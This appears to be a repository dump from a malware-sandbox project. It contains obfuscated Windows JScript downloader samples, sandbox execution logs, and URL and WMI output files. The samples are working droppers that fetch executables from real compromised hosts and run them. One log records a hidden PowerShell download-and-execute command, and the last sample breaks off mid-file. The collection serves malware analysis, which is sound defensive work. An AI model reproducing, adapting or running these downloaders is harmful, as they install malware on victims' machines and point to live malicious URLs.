366) break; 28 | var EOIT = xEnVXGW() % AUePbmz.length; 29 | var KyRewCCEJ = AUePbmz[EOIT]; 30 | var BIxHp = xEnVXGW(); 31 | var TlJTxfwLxp = xjshqCWtQ; 32 | var WDlUJfS = xjshqCWtQ; 33 | var cvSRFkdY = 112 - 111; 34 | var LRACVIJdS = function() { 35 | return new ActiveXObject(WDBmH('WS&WmSxvYpcV&cript&WmSxvYpcV&.She&l&l', [0, 2, 4, 5, 6], '&')); 36 | }(); 37 | var WDlUJfS = ldNrVl(LRACVIJdS) + String.fromCharCode(92) + WDlUJfS; 38 | var TbZdG = function() { 39 | return new ActiveXObject(WDBmH('MSX&DiODGVvSB&ML2.XM&nmWtwgNOhvP&LHTTP', [0, 2, 4], '&')); 40 | }(); 41 | UYCO(KyRewCCEJ, TbZdG); 42 | if (TbZdG.status == 100 + 100) { 43 | var sWPmhUM = function() { 44 | return new ActiveXObject(WDBmH('ADO&DB&PGXbbEcUF&.&nEvdrVaCd&Stream', [0, 1, 3, 5], '&')); 45 | }(); 46 | var pDdQcrVkhARc = qSeGr(sWPmhUM, TbZdG.ResponseBody, WDlUJfS); 47 | } 48 | try { 49 | ckCgnMtxxk(LRACVIJdS, WDlUJfS); 50 | var xtIxXmh = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \'' + TlJTxfwLxp + '\''); 51 | if (xtIxXmh.Count >= 1) { 52 | break; 53 | } 54 | } catch(e) { util_log(_sc + _inspect(e));} 55 | RIHh++; 56 | MBGwN.splice(EOIT, 327 - 326); 57 | } 58 | } 59 | 60 | function ldNrVl(ByNmjV) { 61 | var cxeVjMWm = ["ExpandEnvironmentStrings"]; 62 | return ByNmjV[cxeVjMWm[0]]('%TMP%') 63 | } 64 | 65 | function qSeGr(fVDGQccj, Cmwwv, JCtZgNyuNT) { 66 | try { 67 | fVDGQccj.open(); 68 | mEvJHgAm(fVDGQccj); 69 | ShSvKwv(fVDGQccj, Cmwwv); 70 | EXncmYqiN(fVDGQccj); 71 | SAxs(fVDGQccj, JCtZgNyuNT); 72 | KlpoACZP = fVDGQccj.size; 73 | wcAPLEY(fVDGQccj); 74 | return KlpoACZP; 75 | } catch(e) { util_log(_sc + _inspect(e));} 76 | } 77 | 78 | function UYCO(pEjdKZ, EZDobvT) { 79 | try { 80 | bkIe = 'G*tqEiSfCEFO*E*T*sqkdtRMjxeQR'.split('*'); 81 | EZDobvT.open(bkIe[0] + bkIe[2] + bkIe[3], pEjdKZ, false); 82 | EZDobvT.setRequestHeader("User-Agent", "Python-urllib/3.1"); 83 | EZDobvT.send(); 84 | } catch(e) { util_log(_sc + _inspect(e));} 85 | } 86 | 87 | function WDBmH(mxhXCKNI, zTOiBb, woGPxsmnc) { 88 | nymYF = mxhXCKNI.split(woGPxsmnc); 89 | VvdgKnq = 'isR'; 90 | for (ltaWmxhr = 0; ltaWmxhr < zTOiBb.length; ltaWmxhr++) { 91 | VvdgKnq += nymYF[zTOiBb[ltaWmxhr]]; 92 | } 93 | return VvdgKnq.substring(3, VvdgKnq.length); 94 | } 95 | 96 | function URjKuPKyMgrYr() { /*BCKSGFxZTW().Sleep(5311-410);*/ } 97 | 98 | function YEPOLKB() { 99 | var NIZqdP = ["random"]; 100 | return Math[NIZqdP[0]]() 101 | } 102 | 103 | function iPtA(EVWlhq) { 104 | EVWlhq.open(); 105 | } 106 | 107 | function mEvJHgAm(XPaMCcbtn) { 108 | XPaMCcbtn.type = 1; 109 | } 110 | 111 | function ShSvKwv(UBBO, aRAhF) { 112 | UBBO.write(aRAhF); 113 | } 114 | 115 | function BCKSGFxZTW() { 116 | return /*XQRmBOFMbTPjQDAMKQpicfpILteYagMoPpTqwtDpMrwYdHDBnmBJHHxIfOUkXgZzcIpnLSVMQJxHJEZjjChdGcYCTcfpoaFEIVeetkGco*/ WScript; 117 | } 118 | 119 | function EXncmYqiN(hbpFEH) { 120 | var pOTTAMeVOw = []; 121 | hbpFEH.position = pOTTAMeVOw.length * (4714679 - 679); 122 | } 123 | 124 | function SAxs(nTrxTKR, kQmMEIk) { 125 | nTrxTKR.saveToFile(kQmMEIk, 2); 126 | } 127 | 128 | function wcAPLEY(NZHgp) { 129 | NZHgp.close(); 130 | } 131 | 132 | function xEnVXGW() { 133 | var AzTJ = 99999 + 1; 134 | var vaVlYa = 100; 135 | return Math.round(YEPOLKB() * (AzTJ - vaVlYa) + vaVlYa); 136 | } 137 | 138 | function QOawkeUO(iqwZo) { 139 | var maBHbxuS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; 140 | for (var xfbbJ = 0; xfbbJ < iqwZo; xfbbJ++) { 141 | QvLxV += maBHbxuS.charAt(Math.floor(Math.random() * maBHbxuS.length)); 142 | } 143 | return QvLxV; 144 | } 145 | 146 | function xfgtzigMYScAlH(XVdzyJUSJbBLjI) { 147 | return new ActiveXObject(XVdzyJUSJbBLjI); 148 | } 149 | -------------------------------------------------------------------------------- /malware/20161013/out/tr_malware_20161013__TMP__XipXkrLd.js: -------------------------------------------------------------------------------- 1 | "Thu Oct 13 2016 23:47:13 GMT+0200 (CEST)" 2 | var SvjUKAc = new Date(); 3 | while (true) { 4 | var XwHvxGz = new Date(); 5 | var ERupxfq = new Date(XwHvxGz.getTime() - SvjUKAc.getTime()); 6 | if (ERupxfq.getSeconds() > 5) { 7 | break; 8 | } 9 | WScript.Sleep(500); 10 | } 11 | 12 | function ckCgnMtxxk(ibZdbdKp, CnWtQRBnxBRw) { 13 | nhjyEhX = 0x1; 14 | ScLQeYp = 0x0; 15 | ibZdbdKp.Run(CnWtQRBnxBRw, nhjyEhX, ScLQeYp); 16 | } 17 | /*ToakIoXNFCHbmPvwLmfYFFdfZfhOyyKAhVBlGhbuYuaaPtQBjpqWMUQICukLkzPCPvwfXTyVLfMTKQFAbmUNmdXfyCGAptnxROKUHzooRKSGZhNsmcSyggxwOEwkOhfmmbrBLYyCrirmIspeQMjducrGyzFNHOrVaiscirbJkAkLKwkJOpUBbREKBnhjTpWxiiNxZDYJxM*/ 18 | URjKuPKyMgrYr(); 19 | var mmcXR = ["http://lcbschool2.ac.th/pic/_notes/logs.php"]; 20 | var Wyiwp = ["http://masseriacarparelli.it/logs2.php"]; 21 | OsLAgfHCfdr(mmcXR, '23.exe'); 22 | OsLAgfHCfdr(Wyiwp, '24.exe'); 23 | 24 | function OsLAgfHCfdr(AUePbmz, xjshqCWtQ) { 25 | var RIHh = 407 - 407; 26 | while (true) { 27 | if (AUePbmz.length <= 366 - 366) break; 28 | var EOIT = xEnVXGW() % AUePbmz.length; 29 | var KyRewCCEJ = AUePbmz[EOIT]; 30 | var BIxHp = xEnVXGW(); 31 | var TlJTxfwLxp = xjshqCWtQ; 32 | var WDlUJfS = xjshqCWtQ; 33 | var cvSRFkdY = 112 - 111; 34 | var LRACVIJdS = function() { 35 | return new ActiveXObject(WDBmH('WS&WmSxvYpcV&cript&WmSxvYpcV&.She&l&l', [0, 2, 4, 5, 6], '&')); 36 | }(); 37 | var WDlUJfS = ldNrVl(LRACVIJdS) + String.fromCharCode(92) + WDlUJfS; 38 | var TbZdG = function() { 39 | return new ActiveXObject(WDBmH('MSX&DiODGVvSB&ML2.XM&nmWtwgNOhvP&LHTTP', [0, 2, 4], '&')); 40 | }(); 41 | UYCO(KyRewCCEJ, TbZdG); 42 | if (TbZdG.status == 100 + 100) { 43 | var sWPmhUM = function() { 44 | return new ActiveXObject(WDBmH('ADO&DB&PGXbbEcUF&.&nEvdrVaCd&Stream', [0, 1, 3, 5], '&')); 45 | }(); 46 | var pDdQcrVkhARc = qSeGr(sWPmhUM, TbZdG.ResponseBody, WDlUJfS); 47 | } 48 | try { 49 | ckCgnMtxxk(LRACVIJdS, WDlUJfS); 50 | var xtIxXmh = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \'' + TlJTxfwLxp + '\''); 51 | if (xtIxXmh.Count >= 1) { 52 | break; 53 | } 54 | } catch(e) { util_log(_sc + _inspect(e));} 55 | RIHh++; 56 | MBGwN.splice(EOIT, 327 - 326); 57 | } 58 | } 59 | 60 | function ldNrVl(ByNmjV) { 61 | var cxeVjMWm = ["ExpandEnvironmentStrings"]; 62 | return ByNmjV[cxeVjMWm[0]]('%TMP%') 63 | } 64 | 65 | function qSeGr(fVDGQccj, Cmwwv, JCtZgNyuNT) { 66 | try { 67 | fVDGQccj.open(); 68 | mEvJHgAm(fVDGQccj); 69 | ShSvKwv(fVDGQccj, Cmwwv); 70 | EXncmYqiN(fVDGQccj); 71 | SAxs(fVDGQccj, JCtZgNyuNT); 72 | KlpoACZP = fVDGQccj.size; 73 | wcAPLEY(fVDGQccj); 74 | return KlpoACZP; 75 | } catch(e) { util_log(_sc + _inspect(e));} 76 | } 77 | 78 | function UYCO(pEjdKZ, EZDobvT) { 79 | try { 80 | bkIe = 'G*tqEiSfCEFO*E*T*sqkdtRMjxeQR'.split('*'); 81 | EZDobvT.open(bkIe[0] + bkIe[2] + bkIe[3], pEjdKZ, false); 82 | EZDobvT.setRequestHeader("User-Agent", "Python-urllib/3.1"); 83 | EZDobvT.send(); 84 | } catch(e) { util_log(_sc + _inspect(e));} 85 | } 86 | 87 | function WDBmH(mxhXCKNI, zTOiBb, woGPxsmnc) { 88 | nymYF = mxhXCKNI.split(woGPxsmnc); 89 | VvdgKnq = 'isR'; 90 | for (ltaWmxhr = 0; ltaWmxhr < zTOiBb.length; ltaWmxhr++) { 91 | VvdgKnq += nymYF[zTOiBb[ltaWmxhr]]; 92 | } 93 | return VvdgKnq.substring(3, VvdgKnq.length); 94 | } 95 | 96 | function URjKuPKyMgrYr() { /*BCKSGFxZTW().Sleep(5311-410);*/ } 97 | 98 | function YEPOLKB() { 99 | var NIZqdP = ["random"]; 100 | return Math[NIZqdP[0]]() 101 | } 102 | 103 | function iPtA(EVWlhq) { 104 | EVWlhq.open(); 105 | } 106 | 107 | function mEvJHgAm(XPaMCcbtn) { 108 | XPaMCcbtn.type = 1; 109 | } 110 | 111 | function ShSvKwv(UBBO, aRAhF) { 112 | UBBO.write(aRAhF); 113 | } 114 | 115 | function BCKSGFxZTW() { 116 | return /*XQRmBOFMbTPjQDAMKQpicfpILteYagMoPpTqwtDpMrwYdHDBnmBJHHxIfOUkXgZzcIpnLSVMQJxHJEZjjChdGcYCTcfpoaFEIVeetkGco*/ WScript; 117 | } 118 | 119 | function EXncmYqiN(hbpFEH) { 120 | var pOTTAMeVOw = []; 121 | hbpFEH.position = pOTTAMeVOw.length * (4714679 - 679); 122 | } 123 | 124 | function SAxs(nTrxTKR, kQmMEIk) { 125 | nTrxTKR.saveToFile(kQmMEIk, 2); 126 | } 127 | 128 | function wcAPLEY(NZHgp) { 129 | NZHgp.close(); 130 | } 131 | 132 | function xEnVXGW() { 133 | var AzTJ = 99999 + 1; 134 | var vaVlYa = 100; 135 | return Math.round(YEPOLKB() * (AzTJ - vaVlYa) + vaVlYa); 136 | } 137 | 138 | function QOawkeUO(iqwZo) { 139 | var maBHbxuS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; 140 | for (var xfbbJ = 0; xfbbJ < iqwZo; xfbbJ++) { 141 | QvLxV += maBHbxuS.charAt(Math.floor(Math.random() * maBHbxuS.length)); 142 | } 143 | return QvLxV; 144 | } 145 | 146 | function xfgtzigMYScAlH(XVdzyJUSJbBLjI) { 147 | return new ActiveXObject(XVdzyJUSJbBLjI); 148 | } 149 | -------------------------------------------------------------------------------- /malware/20161013/out/urls.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "url": "http://lcbschool2.ac.th/pic/_notes/logs.php", 4 | "method": "GET", 5 | "request_headers": "Python-urllib/3.1", 6 | "status": 404, 7 | "response_headers": "{\"date\":\"Mon, 16 Apr 2018 23:07:58 GMT\",\"server\":\"Apache/2\",\"content-length\":\"336\",\"connection\":\"close\",\"content-type\":\"text/html; charset=iso-8859-1\"}", 8 | "response_body": "??404 Not Found??

Not Found

?

The requested URL /pic/_notes/logs.php was not found on this server.

?

Additionally, a 404 Not Found?error was encou ... (truncated)", 9 | "statustext": "OK" 10 | }, 11 | { 12 | "url": "http://masseriacarparelli.it/logs2.php", 13 | "method": "GET", 14 | "request_headers": "Python-urllib/3.1", 15 | "status": 404, 16 | "response_headers": "{\"date\":\"Mon, 16 Apr 2018 23:07:59 GMT\",\"server\":\"Apache\",\"content-length\":\"207\",\"connection\":\"close\",\"content-type\":\"text/html; charset=iso-8859-1\"}", 17 | "response_body": "??404 Not Found??

Not Found

?

The requested URL /logs2.php was not found on this server.

??", 18 | "statustext": "OK" 19 | } 20 | ] -------------------------------------------------------------------------------- /malware/20161013/out/wmis.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "arguments": { 4 | "0": "Select * from Win32_Process Where Name = '23.exe'" 5 | }, 6 | "return": "Collection[21]" 7 | }, 8 | { 9 | "arguments": { 10 | "0": "Select * from Win32_Process Where Name = '24.exe'" 11 | }, 12 | "return": "Collection[29]" 13 | } 14 | ] -------------------------------------------------------------------------------- /malware/20161019/7698627e91bd2db3853b9604b710df43deadea9883ae97468a53d20a9601f2d1.out: -------------------------------------------------------------------------------- 1 | 19 Oct 23:02:30 - mailware-jail, a malware sandbox ver. 0.8 2 | 19 Oct 23:02:30 - ------------------------ 3 | 19 Oct 23:02:30 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/other.js,env/console.js 4 | 19 Oct 23:02:30 - Malware files: malware/20161019/7698627e91bd2db3853b9604b710df43deadea9883ae97468a53d20a9601f2d1.js 5 | 19 Oct 23:02:30 - Output file for sandbox dump: sandbox_dump_after.json 6 | 19 Oct 23:02:30 - Output directory for generated files: output/ 7 | 19 Oct 23:02:30 - ==> Preparing Sandbox environment. 8 | 19 Oct 23:02:30 - => Executing: env/utils.js 9 | 19 Oct 23:02:30 - => Executing: env/eval.js 10 | 19 Oct 23:02:30 - Preparing sandbox to intercept eval() calls. 11 | 19 Oct 23:02:30 - => Executing: env/function.js 12 | 19 Oct 23:02:30 - Preparing sandbox to intercept 'new Function()' calls. 13 | 19 Oct 23:02:30 - => Executing: env/wscript.js 14 | 19 Oct 23:02:30 - Preparing sandbox to emulate WScript environment. 15 | 19 Oct 23:02:30 - => Executing: env/other.js 16 | 19 Oct 23:02:30 - => Executing: env/console.js 17 | 19 Oct 23:02:30 - ==> Executing malware file(s). 18 | 19 Oct 23:02:30 - => Executing: malware/20161019/7698627e91bd2db3853b9604b710df43deadea9883ae97468a53d20a9601f2d1.js 19 | 19 Oct 23:02:30 - ActiveXObject(WScript.Shell) 20 | 19 Oct 23:02:30 - Created: WScript.Shell[1] 21 | 19 Oct 23:02:30 - WScript.Shell[1].Run(cmD.exe /c pOWersh^e^Ll.^eXe^ -exe^c^Uti^oN^pO^lic^Y ^bYpaSs^ -n^OPRo^fIle^ -w^IN^D^Ows^Ty^Le h^IDDen (^neW-Obj^ec^T S^y^St^e^M^.ne^T.^we^Bc^L^ieNt)^.DoW^N^Loa^dFi^le('http://www.cambridgeok.top/user.php?f=1.dat','%apPdaTa%.eXe');^S^Tart-Pro^ce^ss^ %aPPdata%.eXe, 0, undefined) 22 | 19 Oct 23:02:30 - ==> Cleaning up sandbox. 23 | 19 Oct 23:02:30 - ==> Script execution finished, dumping sandbox environment to a file. 24 | 19 Oct 23:02:30 - The sandbox context has been saved to: sandbox_dump_after.json 25 | -------------------------------------------------------------------------------- /malware/20161022/ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.out: -------------------------------------------------------------------------------- 1 | 21 Nov 23:11:18 - mailware-jail, a malware sandbox ver. 0.10 2 | 21 Nov 23:11:18 - ------------------------ 3 | 21 Nov 23:11:18 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js 4 | 21 Nov 23:11:18 - Malware files: malware/20161022/ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js 5 | 21 Nov 23:11:18 - Output file for sandbox dump: sandbox_dump_after.json 6 | 21 Nov 23:11:18 - Output directory for generated files: output/ 7 | 21 Nov 23:11:18 - ==> Preparing Sandbox environment. 8 | 21 Nov 23:11:18 - => Executing: env/utils.js quitely 9 | 21 Nov 23:11:18 - => Executing: env/eval.js quitely 10 | 21 Nov 23:11:18 - => Executing: env/function.js quitely 11 | 21 Nov 23:11:18 - => Executing: env/wscript.js quitely 12 | 21 Nov 23:11:18 - => Executing: env/browser.js quitely 13 | 21 Nov 23:11:18 - => Executing: env/agents.js quitely 14 | 21 Nov 23:11:18 - => Executing: env/other.js quitely 15 | 21 Nov 23:11:18 - => Executing: env/console.js quitely 16 | 21 Nov 23:11:18 - ==> Executing malware file(s). ========================================= 17 | 21 Nov 23:11:18 - => Executing: malware/20161022/ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js verbosely, reporting silent catches 18 | 21 Nov 23:11:18 - Saving: output/malware_20161022_ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js 19 | 21 Nov 23:11:19 - ActiveXObject(WScript.Shell) 20 | 21 Nov 23:11:19 - new WScript.Shell[9] 21 | 21 Nov 23:11:19 - WScript.Shell[9].ExpandEnvironmentStrings(%TEMP%/vbNU_w19.exe) 22 | 21 Nov 23:11:19 - ActiveXObject(MSXML2.XMLHTTP) 23 | 21 Nov 23:11:19 - new MSXML2.XMLHTTP[10] 24 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].onreadystatechange = (undefined) 'undefined' 25 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].open(GET,https://caringhomes-my.sharepoint.com/personal/scroker_grettonhomes_co_uk/_layouts/15/guestaccess.aspx?guestaccesstoken=mIsLpZRC5kC0BSqjuCwQfch5hD0Fx9hHVjmqjREs%2b%2fY%3d&docid=0c192762e149049c5831f008a9b492fa8&rev=1,0) 26 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].method = (string) 'GET' 27 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].url = (string) 'https://caringhomes-my.sharepoint.com/personal/scroker_grettonhomes_co_uk/_layouts/15/guestaccess.aspx?guestaccesstoken=mIsLpZRC5kC0BSqjuCwQfch5hD0Fx9hHVjmqjREs%2b%2fY%3d&docid=0c192762e149049c5831f008a9b492fa8&rev=1' 28 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].async = (boolean) 'false' 29 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].async.get() => (boolean) 'false' 30 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].send(undefined) 31 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].method.get() => (string) 'GET' 32 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].url.get() => (string) 'https://caringhomes-my.sharepoint.com/personal/scroker_grettonhomes_co_uk/_layouts/15/guestaccess.aspx?guestaccesstoken=mIsLpZRC5kC0BSqjuCwQfch5hD0Fx9hHVjmqjREs%2b%2fY%3d&docid=0c192762e149049c5831f008a9b492fa8&rev=1' 33 | 21 Nov 23:11:20 - sync_req: MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated) 34 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].status = (number) '200' 35 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].readystate = (number) '4' 36 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].statustext = (string) 'OK' 37 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].responsebody = (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)' 38 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].allresponseheaders = (string) '{"cache-control":"private","content-length":"120808","content-type":"application/pdf","accept-ranges":"bytes","etag":"\"{C192762E-1490-49C5-831F-008A9B492FA8},1\"","server":"Microsoft-IIS/8.5","x-sharepointhealthscore":"0","x-download-options":"noope ... (truncated)' 39 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].onreadystatechange.get() => (undefined) 'undefined' 40 | 21 Nov 23:11:20 - 1: readystate 41 | 21 Nov 23:11:20 - 2: 4 42 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].readystate.get() => (number) '4' 43 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].statustext.get() => (string) 'OK' 44 | 21 Nov 23:11:20 - 5: statusText 45 | 21 Nov 23:11:20 - 6: OK 46 | 21 Nov 23:11:20 - ActiveXObject(ADODB.Stream) 47 | 21 Nov 23:11:20 - new ADODB_Stream[11] 48 | 21 Nov 23:11:20 - ADODB_Stream[11].Open() 49 | 21 Nov 23:11:20 - ADODB_Stream[11].type = (number) '1' 50 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)' 51 | 21 Nov 23:11:20 - ADODB_Stream[11].content = (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)' 52 | 21 Nov 23:11:20 - ADODB_Stream[11].Write(str) - 120808 bytes 53 | 21 Nov 23:11:20 - ADODB_Stream[11].size = (number) '120808' 54 | 21 Nov 23:11:20 - ADODB_Stream[11].position = (number) '0' 55 | 21 Nov 23:11:20 - ADODB_Stream[11].SaveToFile(%TEMP%/vbNU_w19.exe, 2) 56 | 21 Nov 23:11:20 - ADODB_Stream[11].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)' 57 | 21 Nov 23:11:20 - ADODB_Stream[11].Close() 58 | 21 Nov 23:11:20 - WScript.Shell[9].Run(%TEMP%/vbNU_w19.exe, 0, 0) 59 | 21 Nov 23:11:20 - ==> Cleaning up sandbox. 60 | 21 Nov 23:11:20 - ==> Script execution finished, dumping sandbox environment to a file. 61 | 21 Nov 23:11:20 - The sandbox context has been saved to: sandbox_dump_after.json 62 | 21 Nov 23:11:20 - Saving: output/_TEMP__vbNU_w19.exe 63 | -------------------------------------------------------------------------------- /malware/20161210/24c314dcfdfbfe984e7ca9e83a96f0aea1ac37cf92eab609f8d4916e6cde299e.js: -------------------------------------------------------------------------------- 1 | Array.prototype.sapasgo = new Function("return this[0];"); 2 | var zedrotivl0 = ["Posi", "-", "-"].sapasgo(); 3 | var vonybfonp = ["GET", "-", "-", "-"].sapasgo(); 4 | var zahzonun6 = ["rn A", "-", "-"].sapasgo(); 5 | var fewlojohy0 = ['e', "-"].sapasgo(); 6 | var zaltikihp = ["e", "-", "-"].sapasgo(); 7 | var uvcemveryz = ["cia", "-", "-"].sapasgo(); 8 | var qjeczerhasy = ["Scr", "-", "-"].sapasgo(); 9 | var oklepewyv2 = ["hel", "-", "-", "-"].sapasgo(); 10 | var lcowenbism1 = ["r", "-", "-", "-"].sapasgo(); 11 | var avxutqimgilp5 = ['Get', "-", "-", "-"].sapasgo(); 12 | var boneqe0 = ["Spe", "-", "-"].sapasgo(); 13 | var arlynsyhgyz = ['Abs', "-"].sapasgo(); 14 | var okotict0 = ['len', "-", "-"].sapasgo(); 15 | var ywtaxnatni2 = ["n", "-"].sapasgo(); 16 | var elbibogab = ["olt", "-"].sapasgo(); 17 | var asvycyhvuz4 = ["ToFi", "-", "-"].sapasgo(); 18 | var alehyvpa = ["1", "-"].sapasgo(); 19 | var iccakbyjm0 = ["ct", "-", "-"].sapasgo(); 20 | var kimzymgi = ["/ww", "-", "-", "-"].sapasgo(); 21 | var cykkiwo1 = ['run', "-"].sapasgo(); 22 | var tygorgoqo7 = ["ream", "-", "-"].sapasgo(); 23 | var wexquzranvy = ['lFo', "-", "-", "-"].sapasgo(); 24 | var cevymsada5 = [".Fi", "-", "-"].sapasgo(); 25 | var bdufupvod = ["les", "-"].sapasgo(); 26 | var izywmuhlaq0 = ['seB', "-", "-", "-"].sapasgo(); 27 | var suqyztizv1 = [".Fi", "-", "-"].sapasgo(); 28 | var oshydzihy1 = ['pNa', "-", "-"].sapasgo(); 29 | var zjifizu = ["MLHT", "-", "-", "-"].sapasgo(); 30 | var bxehjebucse0 = ["ipt", "-", "-", "-"].sapasgo(); 31 | var ijpofuzdaxw9 = ['me', "-", "-", "-"].sapasgo(); 32 | var elkogdav0 = ["pon", "-"].sapasgo(); 33 | var afosork5 = ["g/l", "-", "-", "-"].sapasgo(); 34 | var ijbihomipw = ["ath", "-", "-"].sapasgo(); 35 | var hsujtykyrly3 = ["ptFu", "-", "-"].sapasgo(); 36 | var wuqavxuwba = ["w.g", "-", "-", "-"].sapasgo(); 37 | var xofufwinpe0 = ["wan", "-"].sapasgo(); 38 | var agovraruh = ['Writ', "-"].sapasgo(); 39 | var hrokwukgejo = ['Sta', "-"].sapasgo(); 40 | var jrehoqu = ['send', "-"].sapasgo(); 41 | var udiplejow7 = ['me', "-", "-"].sapasgo(); 42 | var ikahetkicv9 = ["Get", "-"].sapasgo(); 43 | var seskublom7 = ["ADOD", "-", "-", "-"].sapasgo(); 44 | var lunyltofi0 = ["ope", "-"].sapasgo(); 45 | var qsixhirohw = ["MSXM", "-", "-", "-"].sapasgo(); 46 | var embyshovhaw8 = ["bje", "-", "-"].sapasgo(); 47 | var ukbazukne = ["Typ", "-", "-", "-"].sapasgo(); 48 | var apinejqivf2 = ["WSc", "-", "-"].sapasgo(); 49 | var vykoscu = ["php", "-"].sapasgo(); 50 | var yrumgahka = ["og.", "-"].sapasgo(); 51 | var arydzojib = ['Save', "-", "-"].sapasgo(); 52 | var nehhehus2 = ["yst", "-"].sapasgo(); 53 | var ozosbunf = ["cmd.", "-", "-"].sapasgo(); 54 | var exdidoc5 = ["htt", "-", "-"].sapasgo(); 55 | var otjiqazqecv = ["emO", "-", "-", "-"].sapasgo(); 56 | var hozmimwy6 = ['Res', "-", "-", "-"].sapasgo(); 57 | var popogpi2 = ['Nam', "-"].sapasgo(); 58 | var gjagupfa = ['del', "-", "-"].sapasgo(); 59 | var ldetymlu = ['tion', "-", "-"].sapasgo(); 60 | var yrqebfigw = ['Clos', "-"].sapasgo(); 61 | var qyhazpu = ["\\\\", "-", "-"].sapasgo(); 62 | var bnyzoni6 = ["Fil", "-", "-"].sapasgo(); 63 | var rsugqosenv3 = ["L2.X", "-"].sapasgo(); 64 | var fqovwihho3 = ["ooh", "-"].sapasgo(); 65 | var ragohipga1 = ['lde', "-"].sapasgo(); 66 | var adutoflu3 = ["l", "-"].sapasgo(); 67 | var aryqigohv4 = ['ete', "-", "-", "-"].sapasgo(); 68 | var lvejfobno9 = ["at", "-", "-"].sapasgo(); 69 | var oktyromca = ["ing", "-", "-"].sapasgo(); 70 | var ydmytqon = ["leS", "-", "-"].sapasgo(); 71 | var lyxexry = ["retu", "-", "-"].sapasgo(); 72 | var ircusfaqy6 = ["an.", "-", "-", "-"].sapasgo(); 73 | var ysazsigvy = ["p:/", "-"].sapasgo(); 74 | var ypjokwuln = ["B.St", "-", "-", "-"].sapasgo(); 75 | var pmyjkuse1 = ["ody", "-", "-", "-"].sapasgo(); 76 | var ewpedux = ["eXOb", "-", "-", "-"].sapasgo(); 77 | var animzisqah = ["ing", "-", "-", "-"].sapasgo(); 78 | var yzazym = [";", "-", "-", "-"].sapasgo(); 79 | var usakrizq = ["Get", "-"].sapasgo(); 80 | var dazepweb = ['Tem', "-", "-"].sapasgo(); 81 | var sjoracrudqi = ["Scri", "-"].sapasgo(); 82 | var eqvatokso2 = ["ct", "-", "-", "-"].sapasgo(); 83 | var yhfoqcizte6 = ["tus", "-", "-"].sapasgo(); 84 | var nvaksolomgu8 = ["2.d", "-", "-"].sapasgo(); 85 | var evrasytyl0 = ["ject", "-", "-"].sapasgo(); 86 | var elomgyl1 = ['e', "-", "-"].sapasgo(); 87 | var tmubitral = ["le", "-", "-", "-"].sapasgo(); 88 | var izpekmic1 = ["scr", "-", "-", "-"].sapasgo(); 89 | var uxryhuvxe = WScript; 90 | var ilpafofwet = ['Ope', "-", "-", "-"].sapasgo(); 91 | var ajubigxux = ["/c ", "-", "-", "-"].sapasgo(); 92 | var idojuk = ["bje", "-", "-", "-"].sapasgo(); 93 | var vserburehdu = ["yst", "-", "-"].sapasgo(); 94 | var rvobmewa = ["e", "-"].sapasgo(); 95 | var gputizaqqu = ["t.S", "-", "-", "-"].sapasgo(); 96 | var fonryvtoqj = ["emO", "-", "-", "-"].sapasgo(); 97 | var gijadul = ['llNa', "-", "-"].sapasgo(); 98 | var ertofudlesk = ["ipt", "-", "-"].sapasgo(); 99 | var oznefsazw = ["exe ", "-"].sapasgo(); 100 | var jolivevb2 = ["olu", "-"].sapasgo(); 101 | var etybbili = ["?f=", "-", "-"].sapasgo(); 102 | var setzamyng = ["TP", "-"].sapasgo(); 103 | var jamwofiso = ["e", "-"].sapasgo(); 104 | var gnawiwaz5 = ['n', "-", "-", 